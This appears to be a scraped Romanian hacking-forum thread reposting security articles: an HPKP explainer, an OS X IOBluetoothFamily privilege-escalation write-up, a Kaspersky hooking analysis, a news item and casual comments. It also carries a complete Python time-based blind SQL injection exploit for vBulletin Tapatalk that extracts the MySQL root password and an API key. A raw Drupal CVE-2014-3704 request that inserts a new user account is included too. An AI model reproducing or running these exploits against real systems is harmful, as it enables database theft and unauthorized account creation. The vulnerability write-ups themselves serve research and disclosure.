pin-sha256 values as shown above in the HPKP header. In case the current key is compromised make sure all vulnerabilities are patched and then remove the revoked pin. Generate a CSR for the backup key, let your CA issue a new certificate, and revoke the old one. Upload the new certificate to your server and you are done. Finally, do not forget to generate a new backup key and include that pin in your HPKP header again. Once a browser successfully establishes a TLS connection the next time, it will see your updated HPKP header and replace any stored pins with the new ones. Sursa: https://timtaubert.de/blog/2014/10/http-public-key-pinning-explained/

[h=3]Mac OS X local privilege escalation (IOBluetoothFamily)[/h] (This post is a joint work with @joystick, see also his blog here) Nowadays, exploitation of user-level vulnerabilities is becoming more and more difficult, because of the widespread diffusion of several protection methods, including ASLR, NX, various heap protections, stack canaries, and sandboxed execution. As a natural consequence, instead of extricating themselves with such a plethora of defensive methods, attackers prefer to take the “easy” way and started to move at the kernel-level, where sophisticated protection techniques are still not very common (indeed, things like as KASLR and SMEP are implemented only in the latest versions of the most popular OSes). This trend is also confirmed by the rising number of kernel-level vulnerabilities reported in the last few months in Windows, Linux, and OS X. Following this trend, we recently looked at few OS X drivers (“KEXT”s) and found a integer signedness bug affecting service IOBluetoothHCIController (implemented by the IOBluetoothFamily KEXT). This vulnerability can be exploited by a local attacker to gain root privileges. The issue is present on the latest versions of OS X Mavericks (tested on 10.9.4 and 10.9.5), but has been “silently” patched by Apple in OS X Yosemite. [h=3]Vulnerability overview[/h] In a nutshell, the bug lies in the IOBluetoothHCIUserClient::SimpleDispatchWL() function. The function eventually takes a user-supplied 32-bit signed integer value and uses it to index a global array of structures containing a function pointer. The chosen function pointer is finally called. As the reader can easily imagine, SimpleDispatchWL() fails at properly sanitizing the user-supplied index, thus bad things may happen if a malicious user is able to control the chosen function pointer. More in detail, the vulnerable part of the function is summarized in the pseudocode below. At line 14, the user-supplied 32-bit integer is casted to a 64-bit value. Then, the "if" statement at line 16 returns an error if the casted (signed) value is greater than the number of methods available in the global _sRoutines array; obviously, due to the signed comparison, any negative value for the method_index variable will pass this test. At line 20 method_index is used to access the _sRoutines array, and the retrieved callback is finally called at line 23. [TABLE] [TR] [TD] 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 [/TD] [TD]typedef struct { void (*function_pointer)(); uint64 num_arguments; } BluetoothMethod; BluetoothMethod _sRoutines[] = { ... }; uint64 _sRoutineCount = sizeof(_sRoutines)/sizeof(BluetoothMethod); IOReturn IOBluetoothHCIUserClient::SimpleDispatchWL(IOBluetoothHCIDispatchParams *params) { // Here "user_param" is a signed 32-bit integer parameter int64 method_index = (int64) user_param; if (method_index >= _sRoutineCount) { return kIOReturnUnsupported; } BluetoothMethod method = _sRoutines[method_index]; ... if (method.num_arguments < 8) { method.function_pointer(...); } ... } [/TD] [/TR] [/TABLE] [h=3]Exploitation details[/h] Exploitation of this vulnerability is just a matter of supplying the proper negative integer value in order to make IOBluetoothFamily index the global _sRoutines structure out of its bounds, and to fetch an attacker-controlled structure. The supplied value must be negative to index outside the _sRoutines structure while still satisfying the check at line 16. As a foreword, consider that for our "proof-of-concept" we disabled both SMEP/SMAP and KASLR, so some additional voodoo tricks are required to get a fully weaponized exploit. Thus, our approach was actually very simple: we computed a value for the user-supplied parameter that allowed us to index a BluetoothMethod structure such that BluetoothMethod.function_ptr is a valid user-space address (where we placed our shellcode), while BluetoothMethod.num_arguments is an integer value less than 8 (to satisfy the check performed by SimpleDispatchWL() at line 22). As shown in the C code fragment above, the user-supplied 32-bit value (user_param) is first casted to a 64-bit signed value, and then used as an index in _sRoutines. Each entry of the global _sRoutines array is 16-byte wide (two 8-byte values). These operations are implemented by the following assembly code: [TABLE] [TR] [TD] 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 [/TD] [TD]; r12+70h points to the user-supplied index value mov ecx, [r12+70h] mov r13d, kIOReturnUnsupported lea rdx, _sRoutineCount cmp ecx, [rdx] jge fail ; Go on and fetch _sRoutine[method_index] ... movsxd rax, ecx ; Sign extension to 64-bit value shl rax, 4 ; method_index *= sizeof(BluetoothMethod) lea rdx, _sRoutines mov esi, [rdx+rax+8] ; esi = _sRoutines[method_index].num_arguments cmp esi, 7 ; Check method.num_arguments < 8 ja loc_289BA ... [/TD] [/TR] [/TABLE] At a higher-level, the address of the BluetoothMethod structure fetched when processing an index value "user_param" is computed by the following formula: struct_addr = (ext(user_param & 0xffffffff) * 16) + _sRoutine Where ext() is the sign-extension operation (implemented by the movsxd instruction in the assembly code snipped above). By solving this formula for user_param and searching inside the kernel address space, we found several candidate addresses that matched our criteria (i.e., a valid user-space pointer followed by an integer value < 8). The rest of the exploit is just a matter of mmap()'ing the shellcode at the proper user-space address, connecting to the IOBluetoothHCIController service and invoking the vulnerable method. The source code for a (very rough) proof-of-concept implementation of the aforementioned exploit is available here, while the following figure shows the exploit "in action". [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Execution of our "proof-of-concept" exploit[/TD] [/TR] [/TABLE] [h=3]Patching[/h] We verified the security issue both on OS X Mavericks 10.9.4 and 10.9.5 (MD5 hash values for the IOBluetoothFamily KEXT bundle on these two OS versions are 2a55b7dac51e3b546455113505b25e75 and b7411f9d80bfeab47f3eaff3c36e128f, respectively). After the release of OS X Yosemite (10.10), we noticed the vulnerability has been silently patched by Apple, with no mention about it in the security change log. A side-by-side comparison between versions 10.9.x and 10.10 of IOBluetoothFamily confirms Apple has patched the device driver by rejecting negative values for the user-supplied index. In the figure below, the user-supplied index value is compared against _sRoutineCount (orange basic block). Yosemite adds an additional check to ensure the (signed) index value is non-negative (green basic block, on the right). [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Comparison of the vulnerable OS X driver (Mavericks, on the left) and patched version (Yosemite, on the right)[/TD] [/TR] [/TABLE] [h=3]Conclusions[/h] We contacted Apple on October 20th, 2014, asking for their intention to back-port the security fix to OS X Mavericks. Unfortunately, we got no reply, so we decided to publicly disclose the details of this vulnerability: Yosemite has now been released since a while and is available for free for Apple customers; thus, we don’t think the public disclosure of this bug could endanger end-users. Sursa: Roberto Paleari's blog: Mac OS X local privilege escalation (IOBluetoothFamily)

Kaspersky Hooking Engine Analysis October 27, 2014 By Andrea Sindoni Leave a Comment In this article we will talk about a few hooking techniques used by antivirus software. For the purpose of this analysis the antivirus chosen will be Kaspersky (Antivirus in prova: scarica le versioni trial | Kaspersky Lab IT PURE 3.0 Total Security), we will deal with various hooking techniques used both at user and kernel mode. The reference operating system will be Windows 7 Professional 32-bit. The image below shows a summary of the techniques we will analyze in this article. In order we will deal with: User-space Processes Inline hooking IAT and EAT Virtual Address Descriptor Hidden registry entry IDT SSDT MINI-FILTER IRP TDI HOOKING CALLBACKS Conclusion User-space Processes We start with a brief introduction by looking at the processes of kaspersky in user-space. The main userspace process is “avp.exe” which is instantiated twice: one instance runs under the privileges of NT AUTHORITY\SYSTEM the other is used for the user interface (avp.exe user). The other process: ProtectedObjectsSrv.exe acts as encryption service. We will focus on the last one: it runs as a background Windows service called “CSObjectsSrv” (CryptoStorage control service). InfoWatch CryptoStorage is intended for centralized protection of confidential data using cryptographic methods during data storage and processing. The product is based on the integrative approach to data protection. The functional capabilities include file and folder encryption using resilient encryption algorithms, an option to create special data storage objects – the container files, logical disks and flash drives and differentiation of access rights to the protected objects. InfoWatch CryptoStorage protects against unauthorised access to the RAM content dumped to the hard disk in case of hibernation, crash dumps or data coming from temporary files and swap files. More information about this topic can be found at InfoWatch - information security software products and solutions Let’s now look at all the hooking methods starting from the userland. Inline hooking To find API hooks in User-mode, we can use use the apihooks plugin of Volatility The processes involved in the inline hooking are: svchost.exe avp.exe[pid1] NT Authority\SYSTEM avp.exe[pid2] avp.exe one is for the protection service (avp.exe system), the other one, as already said, is for the user interface (avp.exe user). The service requires full system access, that’s why it runs as System. Let’s examine svchost.exe, this process is subject to inline hooking, in fact, at address 0x7453b5dd we can find a jump that leads to wfapigp.dll, which resides at location 0x74586218. Using Volatility we can dump the process with pid 1560 and using IDA we can quickly disassemble the dump and double check for the presence of the hook at location 0x7453b5dd. Scrolling again the report generated by Volatility, we can see that the process avp.exe uses different modules (image below) The process avp.exe makes use of different hooking techniques??, let’s try and investigate the following module: ushata.dll In this case the hooking occurs inside ntdll.dll, the function hooked is ZwProtectVirtualMemory, which is located at 0x77015f18, checking with IDA we can confirm the presence of a jump at 0x71722066, which is the location in which the hooking module ushata.dll is loaded. In here we can see how avp.exe loads ushdata.dll using a standard LoadLibraryEx() In this context, can occur something similar to what is described in the following code, basically: [TABLE] [TR] [TD=class: code]hDLL = LoadLibraryExW(L"USHATA.DLL", null, 8); lpGetNumber = (LPGETNUMBER)GetProcAddress((HMODULE)hDLL, "InitHooks"); [/TD] [/TR] [/TABLE] Let’s see what are the methods exported by the module ushdata.dll: So the exported functions of ushdata.dll module are InitHooks, SetClientVerdict and SetShuttingDownHint. In general from the report generated by volatility, the modules and functions that are subject to inline hooking, are: C:\Program Files\Kaspersky Lab\Kaspersky PURE 3.0\avp.exe[pid1] and [pid2] C:\Windows\SYSTEM32\ntdll.dll (FUNCTIONS ntdll.dll!NtProtectVirtualMemory e ntdll.dll!ZwProtectVirtualMemory) C:\Program Files\Kaspersky Lab\Kaspersky PURE 3.0\avp.exe[pid1] and [pid2] ntdll.dll!NtProtectVirtualMemory JMP 70B12066 C:\Program Files\Kaspersky Lab\Kaspersky PURE 3.0\ushata.dll C:\Program Files\Kaspersky Lab\Kaspersky PURE 3.0\avp.exe[pid1] and [pid2] C:\Windows\system32\kernel32.dll C:\Program Files\Kaspersky Lab\Kaspersky PURE 3.0\avp.exe[pid1] and [pid2] C:\Windows\system32\ole32.dll C:\Program Files\Kaspersky Lab\Kaspersky PURE 3.0\avp.exe[pid1] and [pid2] USER32.dll!NotifyWinEvent + 6AE The undocumented used is NtProtectVirtualMemory, which will allows to set the page protection and returns the old protection (http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/Memory%20Management/Virtual%20Memory/NtProtectVirtualMemory.html). IAT and EAT Continuing the analysis of the hooking in User-space, we can still make use of Volatility to detect the hooking performed on both the IAT and EAT. We will find only two functions: one for the IAT hooking and another one for EAT hooking. Referring to the image at the top (EAT Hook), we conclude that the affected module is kernel32.dll, specifically the CreateThread function, as shown in the figure below: Virtual Address Descriptor We can open a brief parenthesis on the kernel data structure that takes care of registering the use of virtual addresses in a process, it is called Process VAD (Virtual Address Descriptor). For each process the memory manager maintains a set of VADs, which contain information on the address space of the process itself. Reconstructing the VAD tree allows for the reconstruction of the process with all of its mapped files. Here’s an example: The protection field highlighted in red is extracted from the flProtect parameter passed as input to the VirtualAlloc API (VirtualAlloc function (Windows)). You can also use the windbg command !vad to display the VADs of a given process: [TABLE] [TR] [TD=class: code]kd> !process 0 1 avp.exe kd> !vad [address of VadRoot] [/TD] [/TR] [/TABLE] Hidden registry entry A hive is a database of registry values ??divided in logical groups of keys and subkeys; the values ??in the registry, in turn, have a number of supporting files containing backups of their data. These files are located mainly in the %SystemRoot% \System32\Config and are created/updated each time the user logs in. Here is a table showing the standard hive with the respective files (Registry Hives (Windows)): [TABLE] [TR] [TD]Registry hive[/TD] [TD]Supporting files[/TD] [/TR] [TR] [TD]HKEY_CURRENT_CONFIG[/TD] [TD]System, System.alt, System.log, System.sav[/TD] [/TR] [TR] [TD]HKEY_CURRENT_USER[/TD] [TD]Ntuser.dat, Ntuser.dat.log[/TD] [/TR] [TR] [TD]HKEY_LOCAL_MACHINE\SAM[/TD] [TD]Sam, Sam.log, Sam.sav[/TD] [/TR] [TR] [TD]HKEY_LOCAL_MACHINE\Security[/TD] [TD]Security, Security.log, Security.sav[/TD] [/TR] [TR] [TD]HKEY_LOCAL_MACHINE\Software[/TD] [TD]Software, Software.log, Software.sav[/TD] [/TR] [TR] [TD]HKEY_LOCAL_MACHINE\System[/TD] [TD]System, System.alt, System.log, System.sav[/TD] [/TR] [TR] [TD]HKEY_USERS\.DEFAULT[/TD] [TD]Default, Default.log, Default.sav[/TD] [/TR] [/TABLE] Let’s look for hidden registry values related to the driver klif.sys and let’s start with the help command !reg: !reg hivelist It displays a list of all hives in the system, then we select the Hive Address of SYSTEM using the following command: !reg openkeys “Hive Address of SYSTEM” It displays all open keys in a hive: I also used the above the command: !reg cellIndex “HiveAddress of SYSTEM” “Index” It displays the virtual address for a cell in a hive, Index specifies the cell index. Using the command: !reg valuelist “HiveAddress of SYSTEM” KeyNodeAddress we can show a list of the values in the specified key node, KeyNodeAddress specifies the address of the key node. Then we show the registry key value structure !reg kvalue Address Address specifies the address of the value, finally, we can reuse the cell index with the new index of the cell and dc command (it displays double word values, 4 bytes, and ASCII characters) We can achieve the same result using Volatility, let’s briefly show how to do that using the command hivelist: And once again we come across the KLIF service: Let’s now move to the analysis of the hooking at kernel space, in particular we will deal with: IDT, SSDT and IRP hooking. IDT System calls are used to traverse the barrier that exists between user space and kernel space, for this task the IDT is used, the IDT is the table that implements the interrupt vector table, in turn used to dispatch the interrupts. The IDT is composed, internally, of a data structure of 8 bytes entries, which describes how the interrupt must be managed (x86 CPU). In the picture below you can see the relationship between IDT and the instruction “int 2e” that is normally used to initiate a system call, even though on recent CPUs the SYSENTER instruction is used a replacement. The goal of IDT hooking is to hook any function already registered for a given interrupt. Let’s see if the software in question uses these techniques, so we can analyze it with windbg and the command !idt Now let’s run the same check with volatility,using the command idt, we will see that the two results match: In the selected row we can see, from the column Value, that the address matches the one analyzed with windbg, also in the column Module we can notice the presence of ntoskrnl.exe, which shows that there are no hooks in place. SSDT The System Service Descriptor Table (SSDT) contains pointers to kernel mode functions provided by the kernel executable module (ntoskrnl.exe). There is a second SSDT called shadow SSDT table, that instead stores the native functions provided by the GUI module win32k.sys. It ‘important to make an observation: when a system call reaches ntdll.dll, EAX will contain the hexadecimal value corresponding to the index into the SSDT of the function to be called, and immediately after the command int 2E the control is transferred to KiSystemService: We’re going to check the contents of the two tables for the software in question, it is possible to analyze the memory with Volatility or WinDBG: From the figure on the left hand side we can see the memory belonging to klif.sys at address 0x8C836000. On the right hand side we have the output of the command: kd> dps KiServiceTable l11C that show the presence of SSDT hooks from the klif module. We can also investigate KeServiceDescriptorTable and KeServiceDescriptorTableShadow. The module klif.sys seems to be the one that deals with SSDT and SSDT Shadow hooking. Let’s look more closely at klif.sys, the first function we’re going to inspect is “PsSetLoadImageNotifyRoutine” that registers a driver-supplied callback that is subsequently notified whenever an image is loaded (or mapped into memory). In the image below we see a series of two calls, the first one calls ZwQuerySystemInformation and then the second one invokes KeServiceDescriptorTable, which is the classical sequence used to install an SSDT hook. SSDT hooking is not performed on 64-bits systems because the Kernel Patch Protection (KPP), also known as Patchguard, protects this structure. It is anyway possible to use a mini-filter driver as a workaround. MINI-FILTER And indeed that’s what we have, a minifilter driver: A mini-filter driver must specify an altitude value from an altitude range that represents a load order group. A minifilter driver’s altitude ensures that the instance of the minifilter driver is always loaded at the appropriate location related to other minifilter driver instances, and it determines the order in which the filter manager calls the minifilter driver to handle I/O. Altitudes are allocated and managed by Microsoft itself. The following figure shows a simplified I/O stack with the filter manager and three minifilter drivers. I n our case we have [TABLE] [TR] [TD]Load order group[/TD] [TD]Altitude range[/TD] [TD]Description[/TD] [/TR] [TR] [TD]FSFilter Anti-Virus[/TD] [TD]320000-329999[/TD] [TD]This group includes filter drivers that detect and disinfect viruses during file I/O.[/TD] [/TR] [/TABLE] More information at http://msdn.microsoft.com/en-us/library/windows/hardware/ff549689%28v=vs.85%29.aspx IRP An IRP is an object used to communicate between all the different layers of a driver stack (Driver stacks (Windows Drivers)). For each driver, there are some major functions that receive IRPs to process. These major functions are kept inside a table of pointers. This driver contains the following functions: Driver Entry AddDevice Dispatch routine Unload() The Driver Object structure is presented as follows By default the I/O manager does point the DriverInit at the DriverEntry(). The array MajorFunction is essentially a table, each driver populates this table with function pointers, called Dispatch routine. The main data structures used by the kernel driver majors are the IRPs. Some of the most used are: IRP_MJ_CREATE, IRP_MJ_READ, IRP_MJ_WRITE, IRP_MJ_DEVICE_CONTROL. We can sniff the traffic IRP to the driver klif using Irp Tracker: From the red boxes we can see the two processes: avp.exe and svchost.exe calling the NtFsControlFile API (which sends a control code directly to the driver klif) TDI HOOKING The kernel module responsible for TDI HOOKING is kltdi.sys, we can look for it inside the structure LDR_DATA_TABLE_ENTRY, pointed by PsLoadedModuleList. By running the modules command in Volatility we will get: kltdi.sys 0x8cb7a000 0x9000 \SystemRoot\system32\DRIVERS\kltdi.sys At this point we can check to see if there is something unusual for the driver “tdx“: As we can see this is a list of devices that belongs to \Driver\tdx and in each device the module kltdi.sys is present, loaded at the address 0x8cb57000. Using Windbg we can check what happens at the location where tdx.sys is loaded: tdx.sys 0x8cb57000 0x17000 \SystemRoot\system32\DRIVERS\tdx.sys We only see the location of the major Function IRP_MJ_CREATE: DriverName: tdx DriverStart: 0x8cb57000 DriverSize: 0x17000 DriverStartIo: 0x0 0 IRP_MJ_CREATE 0x8cb62faa tdx.sys Let’s set a breakpoint at the address 0x8cb62faa, this is the location where the major function IRP_MJ_CREATE of the module tdx.sys. After then we can start a ping and the debugger will immediately break at the address we are expecting, thus confirming the existence of a TDI hook. We can see in the call stack the presence of the module kltdi.sys, let’s focus on the function kltdi+0x4803: The IoCallDriver routine sends an IRP to the driver associated with a specified device object, it accepts two input parameters DEVICE_OBJECT*an IRP* [TABLE] [TR] [TD=class: gutter]1 2 3 4[/TD] [TD=class: code]NTSTATUS IoCallDriver( _In_ PDEVICE_OBJECT DeviceObject, _Inout_ PIRP Irp ); [/TD] [/TR] [/TABLE] Quoting the Microsoft’s documentation: An IRP passed in a call to IoCallDriver becomes inaccessible to the higher-level driver, unless the higher-level driver has called IoSetCompletionRoutine to set up an IoCompletion routine for the IRP. If it has, the IRP input to the IoCompletion routine has its I/O status block set by the lower drivers, and all lower-level drivers’ I/O stack locations are filled with zeros. CALLBACKS Now let’s take a look at the kernel callbacks, once again with Volatility: Thread creation (PsSetCreateThreadNotifyRoutine): klif.sys kl1.sys Shutdown callbacks (IoRegisterShutdownNotification): kl1.sys KeRegisterBugCheckReasonCallback kl1.sys There are several addresses for the callbacks, but we want to point out the presence of kernel module kl1.sys, so let’s dig deeper: kl1.sys is is a boot start driver, in the image below you can see the presence (in the DriverEntry routine) of the API IoRegisterBootDriverReinitialization. IoRegisterBootDriverReinitialization() function registers a callback routine that will be called whenever all boot drivers have been loaded. This routine is typically used in filters that attach on non-Plug-and-Play devices, and thus, they cannot rely on AddDevice() function calling to be notified that a new device was created (check this example for more details Let’s Start Again « DriverEntry.com.br). Now let’s also look at the Driver Dispatch Routines: As you can see, all Driver Dispatch Routines point to the same address, kl1+0x32f0 Conclusion The article was written for educational purposes, the analysis is not detailed and many things have been analysed very quickly, also there is still research to be done on the network part. A big thanks goes to Quequero. Reference http://www.reconstructer.org/papers/Hunting%20rootkits%20with%20Windbg.pdf Malware Analysts Cookbook and DVD: Tools and Techniques for Fighting Malicious Code Sursa: https://quequero.org/2014/10/kaspersky-hooking-engine-analysis/

Cei care veniti sa nu uitati tricourile cu "Fan Nytro"!

Hacking Oracle from the Web This paper discusses the exploitation techniques available for exploiting SQL Injection from web applications against the Oracle database. Most of the techniques available over the Internet are based on exploitation when attacker has interactive access to the Oracle database, i.e. he can connect to the database via a SQL client. While some of these techniques can be directly applied when exploiting SQL injection in web applications, this is not always true. Unlike MS-*?SQL, Oracle neither supports nested queries, nor has any direct functionality like xp_cmdshell to allow execution of operating system commands. Extraction of sensitive data from a back-*?end database by exploiting SQL injection in Oracle web applications is well known. Performing privilege escalation and executing operating system commands from web applications is not widely known, and is the subject of this paper. Download: http://7safe.com/assets/pdfs/Hacking_Oracle_From_Web_2.pdf

Daca te interesai, aflai ca le are de dinainte de a intra in politica. Si daca vedeai poze iti dadeai seama ca nu sunt "vile". Problema pe care o vad eu la el e urmatoarea: si el ofera "plase cu de toate" babutelor pe la tara ca sa il voteze. Deci MUIE.

Votati.

[h=1]O nou? meserie în România: specialist în securitate cibernetic?[/h]de Liviu Iancu - Mediafax O nou? meserie va ap?rea în România, de specialist în domeniul securit??ii cibernetice, iar în prezent se lucreaz? la fi?a postului, urmând s? fie introdus? în codul ocupa?ional ?i s? i se stabileasc? standarde salariale, a declarat miercuri Sorin Encu?escu, consilier de stat al primului-ministru. "Preocuparea noastr? în acest moment este aceea ca institu?iile s? aib? oameni specializa?i care s? poat? s? lucreze cât se poate de calificat în acest domeniu. De aceea, odat? cu dezvoltarea sistemului de atribu?ii institu?ionale, în momentul de fa?? se lucreaz? inclusiv la fi?a posturilor pe care urmeaz? s? fie încadrate, în a?a fel încât s? putem fi în m?sur? s? cre?m în România ?i s? punem în codul ocupa?ional func?ia de specialist în domeniul securit??ii cibernetice. Aceast? nou? meserie trebuie recunoscut? ?i trebuie introdus? în codul ocupa?ional român, de unde inclusiv putem stabili standarde de salarizare", a spus Encu?escu la un seminar organizat de grupul UTI. El a ar?tat c? în strategia industriei na?ionale de securitate a fost introdus? o nou? component?, cea a dezvolt?rii ?i sus?inerii operatorilor economici publici ?i cei de stat, care î?i desf??oar? activitatea în domeniul securit??ii cibernetice. "Practic, în acest moment, exist? în con?inutul strategiei, o component? care se refer? la încurajarea întreprinderilor mici ?i mijlocii ?i a start-up-urilor în domeniul securit??ii cibernetice. Sprijinim ?i încuraj?m crearea de astfel de companii", a ad?ugat Encu?escu. Consilierul a men?ionat c? statul inten?ioneaz? s? acorde facilit??i fiscale companiilor care investesc în securitatea cibernetic?. Teodor Cimpoe?u, director la compania de securitate cibernetic? certSIGN din cadrul UTI, a declarat c? în România atacurile cibernetice nu sunt f?cute doar de români, ci ?i de c?tre str?ini. "Este o amenin?are, pe de o parte, pentru utilizatorul individual, care st? pe internet, de la simplul fapt c? îi sunt furate datele de login ?i conturile de re?ele sociale, pân? la a-i fi furate datele bancare sau chiar banii din cont. La companii este mai grav, pentru c? le pot fi afectate structurile informatice cu care î?i desf??oar? activitatea", a mai spus Cimpoe?u. Sursa: O nou? meserie în România: specialist în securitate cibernetic? - Mediafax

[h=1]vBulletin Tapatalk - Blind SQL Injection[/h] #!/usr/bin/env python# -*- coding: utf-8 -*- ''' @author: tintinweb 0x721427D8 ''' import urllib2, urllib import xmlrpclib,re, urllib2,string,itertools,time from distutils.version import LooseVersion class Exploit(object): def __init__(self, target, debug=0 ): self.stopwatch_start=time.time() self.target = target self.path = target self.debug=debug if not self.target.endswith("mobiquo.php"): self.path = self.detect_tapatalk() if not self.path: raise Exception("Could not detect tapatalk or version not supported!") self.rpc_connect() self.attack_func = self.attack_2 def detect_tapatalk(self): # request page, check for tapatalk banner handlers = [ urllib2.HTTPHandler(debuglevel=self.debug), urllib2.HTTPSHandler(debuglevel=self.debug), ] ua = urllib2.build_opener(*handlers) ua.addheaders = [('User-agent', 'Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3')] data = ua.open(self.target).read() if self.debug: print data if not "tapatalkDetect()" in data: print "[xx] could not detect tapatalk. bye..." return None # extract tapatalk version print "[ i] Taptalk detected ... ", path = "".join(re.findall(r"^\s*<link href=[\s'\"]?(http://.*?/)smartbanner/appbanner.css", data, re.MULTILINE|re.DOTALL)) path+="mobiquo.php" print "'%s' ... "%path, data = urllib.urlopen(path).read() version = "".join(re.findall(r"Current Tapatalk plugin version:\s*([\d\.a-zA-Z]+)", data)) if LooseVersion(version) <= LooseVersion("5.2.1"): print "v.%s - OK"%version return path print "v.%s - not vulnerable"%version return None def rpc_connect(self): self.rpc = xmlrpclib.ServerProxy(self.path,verbose=self.debug) def attack_1(self, sqli, sleep=2): ''' SELECT subscribethreadid FROM subscribethread AS subscribethread LEFT JOIN user AS user ON (user.userid=subscribeforum.userid) WHERE subscribethreadid = <INJECTION> AND subscribethreadid.userid = 0"; <INJECTION>: 1 UNION ALL <select_like_probe> OR FALSE ''' query = "-1 union %s and ( select sleep(%s) ) "%(sqli,sleep) query += "union select subscribethreadid from subscribethread where 1=1 OR 1=1" # fix query for "AND subscribeforum.userid=0" if self.debug: print """ SELECT subscribethreadid FROM subscribethread AS subscribethread LEFT JOIN user AS user ON (user.userid=subscribethread.userid) WHERE subscribethreadid = %s AND subscribethread.userid = 0"""%query return self.rpc.unsubscribe_topic("s_%s"%query) #no escape, invalid_char="_" def attack_2(self, sqli, sleep=2): ''' SELECT subscribeforumid FROM subscribeforum AS subscribeforum LEFT JOIN user AS user ON (user.userid=subscribeforum.userid) WHERE subscribeforumid = <INJECTION> AND subscribeforum.userid = 0"; <INJECTION>: 1 UNION ALL <select_like_probe> OR FALSE ''' query = "-1 union %s and ( select sleep(%s) ) "%(sqli,sleep) query += "union select subscribeforumid from subscribeforum where 1=1 OR 1=1" # fix query for "AND subscribeforum.userid=0" if self.debug: print """ SELECT subscribeforumid FROM subscribeforum AS subscribeforum LEFT JOIN user AS user ON (user.userid=subscribeforum.userid) WHERE subscribeforumid = %s AND subscribeforum.userid = 0"""%query return self.rpc.unsubscribe_forum("s_%s"%query) #no escape, invalid_char="_" def attack_blind(self,sqli,sleep=2): return self.attack_func(sqli,sleep=sleep) #return self.attack_func("-1 OR subscribethreadid = ( %s AND (select sleep(4)) ) UNION SELECT 'aaa' FROM subscribethread WHERE subscribethreadid = -1 OR 1 "%sqli) def attack_blind_guess(self,query, column, charset=string.ascii_letters+string.digits,maxlength=32, sleep=2, case=True): ''' provide <query> = select -1 from user where user='debian-sys-maint' where <COLUMN> <GUESS> ''' hit = False # PHASE 1 - guess entry length print "[ ] trying to guess length ..." for guess_length in xrange(maxlength+1): q = query.replace("<COLUMN>","length(%s)"%column).replace("<GUESS>","= %s"%guess_length) self.stopwatch() self.attack_blind(q, sleep) duration = self.stopwatch() print ".", if duration >= sleep-sleep/8: # HIT! - got length! => guess_length hit = True print "" break if not hit: print "[ !!] unable to guess password length, check query!" return None print "[ *] LENGTH = %s"%guess_length # PHASE 2 - guess password up to length print "[ ] trying to guess value ..." hits = 0 result = "" for pos in xrange(guess_length): # for each char pos in up to guessed length for attempt in self.bruteforce(charset, 1): # probe all chars in charset #attempt = re.escape(attempt) if attempt == "%%": attempt= "\%" #LIKE binary = case sensitive.might be better to do caseinsensitive search + recheck case with binary q = query.replace("<COLUMN>",column).replace("<GUESS>","LIKE '%s%s%%' "%(result,attempt)) self.stopwatch() self.attack_blind(q, sleep) duration = self.stopwatch() #print result,attempt," ",duration print ".", if duration >= sleep-sleep/8: if case: # case insensitive hit - recheck case: this is drastically reducing queries needed. q = query.replace("<COLUMN>",column).replace("<GUESS>","LIKE binary '%s%s%%' "%(result,attempt.lower())) self.stopwatch() self.attack_blind(q, sleep) duration = self.stopwatch() if duration >= sleep-sleep/8: attempt = attempt.lower() else: attempt = attempt.upper() # case sensitive - end # HIT! - got length! => guess_length hits += 1 print "" print "[ +] HIT! - %s[%s].."%(result,attempt) result += attempt break if not hits==guess_length: print "[ !!] unable to guess password length, check query!" return None print "[ *] SUCCESS!: query: %s"%(query.replace("<COLUMN>",column).replace("<GUESS>","='%s'"%result)) return result def bruteforce(self, charset, maxlength): return (''.join(candidate) for candidate in itertools.chain.from_iterable(itertools.product(charset, repeat=i) for i in range(1, maxlength + 1))) def stopwatch(self): stop = time.time() diff = stop - self.stopwatch_start self.stopwatch_start=stop return diff if __name__=="__main__": #googledork: https://www.google.at/search?q=Tapatalk+Banner+head+start DEBUG = False TARGET = "http://TARGET/vbb4/forum.php" x = Exploit(TARGET,debug=DEBUG) print "[ ] TAPATALK for vBulletin 4.x - SQLi" print "[--] Target: %s"%TARGET if DEBUG: print "[--] DEBUG-Mode!" print "[ +] Attack - sqli" query = u"-1 UNION SELECT 1%s"%unichr(0) if DEBUG: print u""" SELECT subscribeforumid FROM subscribeforum AS subscribeforum LEFT JOIN user AS user ON (user.userid=subscribeforum.userid) WHERE subscribeforumid = %s AND subscribeforum.userid = 0"""%query print "[ *] guess mysql user/pass" print x.attack_blind_guess("select -1 from mysql.user where user='root' and <COLUMN> <GUESS>", column="password", charset="*"+string.hexdigits, maxlength=45) # usually 40 chars + 1 print "[ *] guess apikey" print x.attack_blind_guess("select -1 from setting where varname='apikey' and <COLUMN> <GUESS>", column='value', charset=string.ascii_letters+string.digits, maxlength=14, ) print "-- done --" Sursa: vBulletin Tapatalk - Blind SQL Injection

O sa ma bag si eu daca se mai ofera 2 persoane.

FindWindow, FindWindowEx, GetWindowRect. Sunt multe functii de Windows pe care le poti folosi: Window Functions (Windows) Nu stiu insa ce iti ofera AutoIT-ul.

[h=1]Drupal CVE-2014-3704 insert new user[/h] POST /drupal/?q=node&destination=node HTTP/1.1 TE: deflate,gzip;q=0.3 Connection: TE, close Host: 192.168.88.88 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9.2a1pre) Gecko Content-Type: application/x-www-form-urlencoded Content-Length: 258 name[0%20;insert+into+users+%28uid%2cname%2cpass%2cstatus%29+values+%28123456%2c'greenbull'%2c'$S$DkH0O9Lpt5i1oUi9yYeouLW0ZCAHo/u75ReE1zjCPaPbZoVZQX/m'%2c1%29;;#%20%20]=nTzlWXKY&name[0]=ptSHbjbW&pass=o81NgWxc&form_build_id=&form_id=user_login_block&op=Log+in

Puteti folosi categoria "Free stuff" daca doriti sa oferiti ceva. Oferiti cui doriti, pe ce criterii doriti. Bafta!

Whoa: http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4182969-security-patch-release-for-vbulletin-connect-5-0-0-5-1-4

